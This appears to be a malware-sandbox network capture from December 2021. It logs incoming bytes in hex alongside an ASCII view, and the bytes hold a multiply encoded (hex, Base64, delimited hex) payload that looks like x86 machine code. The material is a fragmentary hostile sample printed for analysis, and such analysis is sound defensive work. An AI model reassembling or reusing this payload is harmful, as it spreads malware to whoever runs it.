                                      Data Ascii: NCxgMEIsYDAwLGAwMCxgMUUsYDc2LGAxQSxgMzksYDlFLGBEQyxgMjAsYDAxLGAwMCxgNzQsYDEyLGA1NixgODksYDVGLGAyQyxgRTgsYDlDLGA5MCxgMDAsYDAwLGA4MyxgQzQsYDA0LGA4OSxgOUUsYDY0LGAwQixgMDAsYDAwLGAzOSxgNUYsYDEwLGA3NSxgMzIsYDM5LGA1RixgMUMsYDc1LGAyRCxgODEsYEJFLGA2OCxgMEIsYDAwLGA
                                      2021-12-02 17:36:08 UTC1015INData Raw: 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 78 4e 53 78 67 4f 44 45 73 59 45 4d 33 4c 47 42 46 4d 43 78 67 4e 44 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 63 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4e 7a 4d 73 59 45 56 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 6b 4d 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 42 44 4c 47 41 31 51 69 78 67 4e 55 59 73 59 45 49 34 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 55 55 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 31 51 69 78 67 4e 55 59 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4e 55 55 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 31 52 69 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41
                                      Data Ascii: QSxgMDAsYDZBLGAxNSxgODEsYEM3LGBFMCxgNDksYDAwLGAwMCxgNTcsYDU2LGBFOCxgNzMsYEVDLGAwMCxgMDAsYDgzLGBDNCxgMkMsYDg1LGBDMCxgNzQsYDBDLGA1QixgNUYsYEI4LGAwMSxgMDAsYDAwLGAwMCxgNUUsYDhCLGBFNSxgNUQsYEMzLGA1QixgNUYsYDMzLGBDMCxgNUUsYDhCLGBFNSxgNUQsYEMzLGA1RixgMzMsYEMwLGA
                                      2021-12-02 17:36:08 UTC1031INData Raw: 4f 53 78 67 4e 54 41 73 59 44 41 34 4c 47 41 33 4e 53 78 67 4d 44 6b 73 59 44 4d 35 4c 47 41 31 4d 43 78 67 4d 45 4d 73 59 44 42 47 4c 47 41 34 4e 43 78 67 51 6a 45 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 42 4c 47 41 30 52 53 78 67 4d 45 4d 73 59 44 67 77 4c 47 42 47 4f 53 78 67 4f 45 49 73 59 44 63 30 4c 47 41 77 4d 69 78 67 4f 44 6b 73 59 44 45 77 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 45 5a 44 4c 47 41 33 4e 43 78 67 4d 44 4d 73 59 44 67 35 4c 47 41 31 4d 43 78 67 4d 44 51 73 59 44 67 77 4c 47 42 47 4f 53 78 67 4d 44 4d 73 59 44 63 30 4c 47 41 77 4d 79 78 67 4f 44 6b 73 59 44 55 77 4c 47 41 77 4f 43 78 67 4d 7a 6b 73 59 44 45 77 4c 47 41 33 4e 53 78 67 4d 54 4d 73 59 44 4d 35 4c 47 41 31 4d 43 78 67 4d 44 51 73 59 44 63 31 4c 47 41
                                      Data Ascii: OSxgNTAsYDA4LGA3NSxgMDksYDM5LGA1MCxgMEMsYDBGLGA4NCxgQjEsYEZELGBGRixgRkYsYDhBLGA0RSxgMEMsYDgwLGBGOSxgOEIsYDc0LGAwMixgODksYDEwLGA4MCxgRjksYEZDLGA3NCxgMDMsYDg5LGA1MCxgMDQsYDgwLGBGOSxgMDMsYDc0LGAwMyxgODksYDUwLGAwOCxgMzksYDEwLGA3NSxgMTMsYDM5LGA1MCxgMDQsYDc1LGA
                                      2021-12-02 17:36:08 UTC1047INData Raw: 4d 79 78 67 4d 44 45 73 59 44 41 77 4c 47 42 46 4f 53 78 67 4e 45 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 35 4e 53 78 67 52 6a 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 79 4c 47 41 32 51 53 78 67 4e 30 4d 73 59 44 55 7a 4c 47 42 46 4f 43 78 67 51 55 51 73 59 45 51 33 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 55 77 4c 47 42 46 4f 43 78 67 4d 44 51 73 59 45 51 34 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 45 32 4c 47 41 34 51 69 78 67 4e 7a 55 73 59 44 42 44 4c 47 41 32 51 53 78 67 4d 54 51 73 59 45 4d 33 4c 47 41 30 4e 69 78 67 4d 54 67 73 59 44 41 31 4c 47 41
                                      Data Ascii: MyxgMDEsYDAwLGBFOSxgNEUsYEZGLGBGRixgRkYsYDhELGA5NSxgRjgsYEZFLGBGRixgRkYsYDUyLGA2QSxgN0MsYDUzLGBFOCxgQUQsYEQ3LGAwMCxgMDAsYDgzLGBDNCxgMDgsYDUwLGBFOCxgMDQsYEQ4LGAwMCxgMDAsYDgzLGBDNCxgMDgsYDg1LGBDMCxgNzQsYDE2LGA4QixgNzUsYDBDLGA2QSxgMTQsYEM3LGA0NixgMTgsYDA1LGA
                                      2021-12-02 17:36:08 UTC1063INData Raw: 4d 43 78 67 4e 6a 67 73 59 44 41 32 4c 47 41 77 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 68 45 4c 47 42 47 51 53 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 45 73 59 44 4d 7a 4c 47 42 47 4e 69 78 67 4e 6a 59 73 59 44 67 35 4c 47 41 34 4e 53 78 67 52 6a 67 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 55 34 4c 47 41 33 4f 43 78 67 4d 30 4d 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 54 4d 73 59 45 55 34 4c 47 42 46 4d 69 78 67 4d 30 55 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 43 78 67 4d 55 59 73 59 44 68 45 4c 47 42 43 52 43 78 67 52 6a 67 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 43 4c 47 42
                                      Data Ascii: MCxgNjgsYDA2LGAwMixgMDAsYDAwLGA1MCxgOEQsYDhELGBGQSxgRkQsYEZGLGBGRixgNTEsYDMzLGBGNixgNjYsYDg5LGA4NSxgRjgsYEZELGBGRixgRkYsYEU4LGA3OCxgM0MsYDAxLGAwMCxgNTMsYEU4LGBFMixgM0UsYDAxLGAwMCxgODMsYEM0LGAxMCxgODUsYEMwLGA3NCxgMUYsYDhELGBCRCxgRjgsYEZELGBGRixgRkYsYDhCLGB
                                      2021-12-02 17:36:08 UTC1079INData Raw: 4e 53 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 52 44 67 73 59 44 68 45 4c 47 41 31 4e 53 78 67 52 6a 41 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 45 4d 31 4c 47 42 47 4d 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 42 47 4c 47 41 34 4e 43 78 67 4d 44 6b 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 45 4c 47 41 34 4e 53 78 67 52 54 41 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 59 77 4c 47 41 31 4d 53 78 67 52 54 67 73 59 45 4a 42 4c 47 42 47 4d 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 34 52 43 78 67 51 54 51 73 59 44 49 30 4c 47 41
                                      Data Ascii: NSxgMDEsYDAwLGA4QixgRDgsYDhELGA1NSxgRjAsYDUyLGA1NixgRTgsYEM1LGBGMCxgRkYsYEZGLGA4MyxgQzQsYDA4LGA4NSxgQzAsYDBGLGA4NCxgMDksYDAxLGAwMCxgMDAsYDhELGA4NSxgRTAsYEY5LGBGRixgRkYsYDUwLGA4RCxgNEQsYEYwLGA1MSxgRTgsYEJBLGBGMixgRkYsYEZGLGA4MyxgQzQsYDA4LGA4RCxgQTQsYDI0LGA
                                      2021-12-02 17:36:08 UTC1095INData Raw: 4f 53 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 4d 73 59 44 55 77 4c 47 41 34 4f 43 78 67 4e 55 51 73 59 45 52 44 4c 47 41 34 4f 43 78 67 4e 55 51 73 59 45 4d 30 4c 47 41 34 4f 43 78 67 4e 55 51 73 59 45 46 44 4c 47 41 34 4f 43 78 67 4f 55 51 73 59 45 49 34 4c 47 42 47 52 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4e 30 45 73 59 44 49 30 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 45 4d 73 59 44 5a 42 4c 47 41 78 4e 43 78 67 52 54 67 73 59 45 4e 44 4c 47 41 30 52 53 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 41 73 59 44 41 79 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 52 45 4c 47 42 44 4e 43 78 67 4e 54 45 73 59 45 55 34 4c 47 42 42 4d 79 78 67 51 7a 49 73 59 44 41 77 4c 47 41
                                      Data Ascii: OSxgRkUsYEZGLGBGRixgNTMsYDUwLGA4OCxgNUQsYERDLGA4OCxgNUQsYEM0LGA4OCxgNUQsYEFDLGA4OCxgOUQsYEI4LGBGRSxgRkYsYEZGLGBFOCxgN0EsYDI0LGAwMSxgMDAsYDgzLGBDNCxgMEMsYDZBLGAxNCxgRTgsYENDLGA0RSxgMDEsYDAwLGA4MyxgQzAsYDAyLGA1MCxgOEQsYDRELGBDNCxgNTEsYEU4LGBBMyxgQzIsYDAwLGA
                                      2021-12-02 17:36:08 UTC1111INData Raw: 4d 43 78 67 4d 44 51 73 59 44 4e 43 4c 47 42 44 52 69 78 67 4e 30 4d 73 59 44 6c 46 4c 47 41 34 51 69 78 67 4e 54 55 73 59 44 45 77 4c 47 41 7a 51 69 78 67 51 30 45 73 59 44 64 45 4c 47 41 31 51 69 78 67 4d 45 59 73 59 45 49 32 4c 47 41 7a 51 79 78 67 4d 7a 45 73 59 45 4d 78 4c 47 42 46 52 69 78 67 4d 44 49 73 59 44 68 42 4c 47 41 31 51 79 78 67 4d 30 51 73 59 45 4d 77 4c 47 41 30 51 53 78 67 4f 44 67 73 59 44 45 34 4c 47 41 7a 51 69 78 67 51 30 45 73 59 44 63 31 4c 47 41 78 4e 69 78 67 4d 45 59 73 59 45 4a 46 4c 47 41 77 51 79 78 67 4d 7a 45 73 59 44 67 7a 4c 47 42 46 4d 53 78 67 4d 44 4d 73 59 44 41 7a 4c 47 42 44 4f 53 78 67 4f 45 45 73 59 44 55 30 4c 47 42 44 52 43 78 67 51 7a 41 73 59 44 67 34 4c 47 41 31 4d 43 78 67 4d 44 45 73 59 45 4d 32 4c 47 41
                                      Data Ascii: MCxgMDQsYDNCLGBDRixgN0MsYDlFLGA4QixgNTUsYDEwLGAzQixgQ0EsYDdELGA1QixgMEYsYEI2LGAzQyxgMzEsYEMxLGBFRixgMDIsYDhBLGA1QyxgM0QsYEMwLGA0QSxgODgsYDE4LGAzQixgQ0EsYDc1LGAxNixgMEYsYEJFLGAwQyxgMzEsYDgzLGBFMSxgMDMsYDAzLGBDOSxgOEEsYDU0LGBDRCxgQzAsYDg4LGA1MCxgMDEsYEM2LGA
                                      2021-12-02 17:36:08 UTC1127INData Raw: 4d 43 78 67 4e 54 59 73 59 44 55 33 4c 47 41 7a 4d 79 78 67 51 7a 41 73 59 44 59 34 4c 47 41 77 4e 69 78 67 4d 44 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 41 73 59 44 68 45 4c 47 41 34 52 43 78 67 4f 45 55 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 7a 4e 43 78 67 4d 55 49 73 59 44 55 78 4c 47 41 34 4f 53 78 67 4e 7a 55 73 59 45 5a 44 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 67 31 4c 47 41 34 51 79 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 54 67 73 59 44 63 77 4c 47 41 77 51 79 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 41 34 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6b 31 4c 47 41 34 51 79 78 67 52 6b 51 73 59 45 5a 47 4c 47 42
                                      Data Ascii: MCxgNTYsYDU3LGAzMyxgQzAsYDY4LGAwNixgMDIsYDAwLGAwMCxgNTAsYDhELGA4RCxgOEUsYEZELGBGRixgRkYsYDhELGAzNCxgMUIsYDUxLGA4OSxgNzUsYEZDLGA2NixgODksYDg1LGA4QyxgRkQsYEZGLGBGRixgRTgsYDcwLGAwQyxgMDEsYDAwLGA4QixgNDUsYDA4LGA2QSxgMDAsYDZBLGAwMCxgOEQsYDk1LGA4QyxgRkQsYEZGLGB
                                      2021-12-02 17:36:08 UTC1143INData Raw: 51 69 78 67 4d 44 4d 73 59 44 68 43 4c 47 41 31 52 43 78 67 52 6a 67 73 59 44 67 7a 4c 47 41 33 52 43 78 67 4d 44 67 73 59 44 41 77 4c 47 41 33 4e 43 78 67 4d 55 51 73 59 44 5a 42 4c 47 41 30 51 79 78 67 4e 54 59 73 59 45 55 34 4c 47 42 43 4d 53 78 67 4f 45 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 69 78 67 4e 54 63 73 59 45 55 34 4c 47 41 32 4d 69 78 67 4f 54 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 51 79 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 51 79 78 67 52 54 67 73 59 44 5a 47 4c 47 41 7a 4d 79 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 4f 53 78 67 4e 7a 41 73 59 44 41 7a 4c 47 41
                                      Data Ascii: QixgMDMsYDhCLGA1RCxgRjgsYDgzLGA3RCxgMDgsYDAwLGA3NCxgMUQsYDZBLGA0QyxgNTYsYEU4LGBCMSxgOEYsYDAwLGAwMCxgOEIsYDU1LGAwOCxgNTAsYDZBLGAwMCxgNkEsYDAwLGA1MixgNTcsYEU4LGA2MixgOTAsYDAwLGAwMCxgODMsYEM0LGAxQyxgODksYDQ1LGBGQyxgRTgsYDZGLGAzMyxgMDEsYDAwLGA4OSxgNzAsYDAzLGA
                                      2021-12-02 17:36:08 UTC1159INData Raw: 4f 43 78 67 4f 45 49 73 59 44 51 33 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 68 45 4c 47 41 33 51 79 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 44 41 34 4c 47 41 34 51 69 78 67 4d 54 63 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 54 51 73 59 44 5a 42 4c 47 41 77 4d 69 78 67 4e 54 49 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 44 41 34 4c 47 41 31 4d 53 78 67 4e 54 59 73 59 45 55 34 4c 47 42 45 4e 53 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 4d 43 78 67 4f 44 6b 73 59 44 67 31 4c 47 41 33 51 79 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 30 49 73 59 45 4d 7a 4c 47 41 33 4e 43 78 67 4e 44 4d 73 59 44 68 43 4c 47 41 30 4e 53 78 67 52 6b 4d 73 59 44 68 45 4c 47 41
                                      Data Ascii: OCxgOEIsYDQ3LGAwOCxgOEIsYDhELGA3QyxgRkQsYEZGLGBGRixgODksYDA4LGA4QixgMTcsYDhCLGA0NSxgMTQsYDZBLGAwMixgNTIsYDUwLGA4RCxgNEQsYDA4LGA1MSxgNTYsYEU4LGBENSxgRkEsYEZGLGBGRixgODMsYEM0LGAyMCxgODksYDg1LGA3QyxgRkQsYEZGLGBGRixgM0IsYEMzLGA3NCxgNDMsYDhCLGA0NSxgRkMsYDhELGA
                                      2021-12-02 17:36:08 UTC1175INData Raw: 4d 69 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 44 55 73 59 44 41 34 4c 47 41 31 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 42 43 4e 79 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 4d 43 78 67 4f 44 4d 73 59 45 4a 46 4c 47 41 31 4e 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 63 30 4c 47 41 79 4e 53 78 67 4f 45 51 73 59 44 68 45 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 45 73 59 45 55 34 4c 47 42 45 52 69 78 67 52 55 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 4d 73 59 45 4d 77 4c 47 41 31 4d 43 78 67 4f 45 49 73 59 44 67 32 4c 47 41 31 4e 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6b 31 4c 47 41
                                      Data Ascii: MixgNkEsYDAwLGA4RCxgNDUsYDA4LGA1MCxgNTYsYEU4LGBCNyxgRkEsYEZGLGBGRixgODMsYEM0LGAyMCxgODMsYEJFLGA1NCxgMEIsYDAwLGAwMCxgMDAsYDc0LGAyNSxgOEQsYDhELGAwMCxgRkMsYEZGLGBGRixgNTEsYEU4LGBERixgRUEsYDAwLGAwMCxgMDMsYEMwLGA1MCxgOEIsYDg2LGA1NCxgMEIsYDAwLGAwMCxgOEQsYDk1LGA
                                      2021-12-02 17:36:08 UTC1191INData Raw: 51 69 78 67 52 6a 67 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 55 4d 73 59 44 67 31 4c 47 42 47 52 69 78 67 4d 45 59 73 59 44 67 30 4c 47 41 35 51 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 45 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 34 4c 47 41 77 4d 43 78 67 4e 7a 59 73 59 44 41 33 4c 47 42 43 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4f 43 78 67 4d 44 41 73 59 45 56 43 4c 47 41 77 4e 53 78 67 4f 44 4d 73 59 45 5a 47 4c 47 41 30 4f 43 78 67 4e 7a 59 73 59 44 55 77 4c 47 41 31 4d 79 78 67 4f 45 49 73 59 44 6c 46 4c 47 42 45 4f 43 78 67 4d 44 63 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 55 73 59 45 52 43 4c 47 41 33 4e 43 78 67 4e 44 51 73 59 44 5a 42 4c 47 41 77 4e 53 78 67 4f 45 51 73 59 44 55 31 4c 47 42
                                      Data Ascii: QixgRjgsYDgzLGBDNCxgMUMsYDg1LGBGRixgMEYsYDg0LGA5QixgMDAsYDAwLGAwMCxgODEsYEZGLGAwMCxgMDAsYDA4LGAwMCxgNzYsYDA3LGBCRixgMDAsYDAwLGAwOCxgMDAsYEVCLGAwNSxgODMsYEZGLGA0OCxgNzYsYDUwLGA1MyxgOEIsYDlFLGBEOCxgMDcsYDAwLGAwMCxgODUsYERCLGA3NCxgNDQsYDZBLGAwNSxgOEQsYDU1LGB
                                      2021-12-02 17:36:08 UTC1207INData Raw: 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 54 55 73 59 44 68 45 4c 47 41 34 52 53 78 67 52 6a 41 73 59 44 41 34 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 55 78 4c 47 41 31 4e 69 78 67 51 7a 63 73 59 44 67 77 4c 47 41 7a 4d 43 78 67 4d 6a 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 41 32 4f 43 78 67 4e 55 4d 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 43 78 67 4d 45 45 73 59 44 55 77 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 5a 42 4c 47 42 47 52 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 31 52 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41
                                      Data Ascii: MCxgNkEsYDAwLGA2QSxgMTUsYDhELGA4RSxgRjAsYDA4LGAwMCxgMDAsYDUxLGA1NixgQzcsYDgwLGAzMCxgMjAsYDAwLGAwMCxgMDEsYDAwLGAwMCxgMDAsYEU4LGA2OCxgNUMsYDAwLGAwMCxgODMsYEM0LGAxMCxgODUsYEMwLGA3NCxgMEEsYDUwLGA1NixgRTgsYDZBLGBGRSxgRkYsYEZGLGA4MyxgQzQsYDA4LGA1RSxgNUQsYEMzLGA
                                      2021-12-02 17:36:08 UTC1223INData Raw: 52 69 78 67 52 6b 59 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 41 73 59 45 4d 32 4c 47 41 34 4e 53 78 67 4d 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 77 4c 47 42 46 4f 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 45 4c 47 41 34 52 43 78 67 4d 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 5a 42 4c 47 41 77 4e 69 78 67 4e 54 45 73 59 45 55 34 4c 47 41 78 4e 53 78 67 52 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6b 31 4c 47 41 79 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 44 68 45 4c 47 41 31 52 69 78 67 4d 55 4d 73 59 44 55 7a 4c 47 42 46 4f 43 78 67 52 6a 55 73 59 45 49 79 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 67 7a 4c 47 42
                                      Data Ascii: RixgRkYsYDZBLGAwMCxgNTAsYEM2LGA4NSxgMkMsYEZGLGBGRixgRkYsYDAwLGBFOCxgODMsYEM0LGAwMCxgMDAsYDhELGA4RCxgMkMsYEZGLGBGRixgRkYsYDZBLGAwNixgNTEsYEU4LGAxNSxgRDAsYDAwLGAwMCxgOEQsYDk1LGAyQyxgRkYsYEZGLGBGRixgNTIsYDhELGA1RixgMUMsYDUzLGBFOCxgRjUsYEIyLGBGRixgRkYsYDgzLGB
                                      2021-12-02 17:36:08 UTC1239INData Raw: 4f 53 78 67 4e 6a 51 73 59 45 4d 32 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 41 77 4c 47 42 46 4f 43 78 67 52 6a 6b 73 59 45 4a 46 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 5a 42 4c 47 41 77 4d 53 78 67 4e 6b 45 73 59 44 46 42 4c 47 41 31 4e 69 78 67 52 54 67 73 59 45 56 44 4c 47 42 43 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 55 51 73 59 44 41 34 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 30 4c 47 41 34 52 43 78 67 4f 45 4d 73 59 44 51 33 4c 47 41 32 4f 43 78 67 4d 44 67 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 55 7a 4c 47 42 46 4f 43 78 67 4e 44 67 73 59 45 46 42 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41
                                      Data Ascii: OSxgNjQsYEM2LGA0NSxgRjgsYDAwLGBFOCxgRjksYEJFLGAwMCxgMDAsYDgzLGBDNCxgMDgsYDZBLGAwMSxgNkEsYDFBLGA1NixgRTgsYEVDLGBCQSxgMDAsYDAwLGA4QixgNUQsYDA4LGA4MyxgQzQsYDA0LGA4RCxgOEMsYDQ3LGA2OCxgMDgsYDAwLGAwMCxgNTEsYDUzLGBFOCxgNDgsYEFBLGBGRixgRkYsYDMzLGBDMCxgODMsYEM0LGA
                                      2021-12-02 17:36:08 UTC1255INData Raw: 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 42 51 79 78 67 51 6a 67 73 59 44 63 79 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 42 52 53 78 67 51 6a 67 73 59 44 59 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4d 43 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4d 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4e 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 51 79 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 44 4d 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 44 4e 43 78 67 51 6a 67 73 59 44 51 7a 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41
                                      Data Ascii: NixgODksYDQ1LGBBQyxgQjgsYDcyLGAwMCxgMDAsYDAwLGA2NixgODksYDQ1LGBBRSxgQjgsYDYxLGAwMCxgMDAsYDAwLGA2NixgODksYDQ1LGBCMCxgMzMsYEMwLGA2NixgODksYDQ1LGBCMixgODksYDQ1LGBCNCxgODksYDQ1LGBCOCxgODksYDQ1LGBCQyxgODksYDQ1LGBDMCxgODksYDQ1LGBDNCxgQjgsYDQzLGAwMCxgMDAsYDAwLGA
                                      2021-12-02 17:36:08 UTC1271INData Raw: 52 69 78 67 52 44 45 73 59 44 68 43 4c 47 41 31 4e 53 78 67 52 6b 4d 73 59 44 5a 42 4c 47 41 77 4d 53 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 4f 45 49 73 59 44 67 32 4c 47 42 44 4d 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 49 73 59 45 5a 47 4c 47 42 45 4d 43 78 67 4f 45 49 73 59 44 52 45 4c 47 42 47 51 79 78 67 4f 45 49 73 59 44 6b 32 4c 47 42 44 4e 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 79 4c 47 41 31 4d 53 78 67 4f 45 49 73 59 45 51 34 4c 47 42 47 52 69 78 67 52 44 49 73 59 44 68 43 4c 47 41 34 52 53 78 67 51 7a 67 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 35 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 68 43 4c 47 41 30 4e 53 78 67 52 6b 4d 73 59 44 5a 42 4c 47 41
                                      Data Ascii: RixgRDEsYDhCLGA1NSxgRkMsYDZBLGAwMSxgODksYDQ1LGBGNCxgOEIsYDg2LGBDMCxgMDEsYDAwLGAwMCxgNTIsYEZGLGBEMCxgOEIsYDRELGBGQyxgOEIsYDk2LGBDNCxgMDEsYDAwLGAwMCxgNkEsYDAyLGA1MSxgOEIsYEQ4LGBGRixgRDIsYDhCLGA4RSxgQzgsYDAxLGAwMCxgMDAsYDg5LGA0NSxgRjgsYDhCLGA0NSxgRkMsYDZBLGA
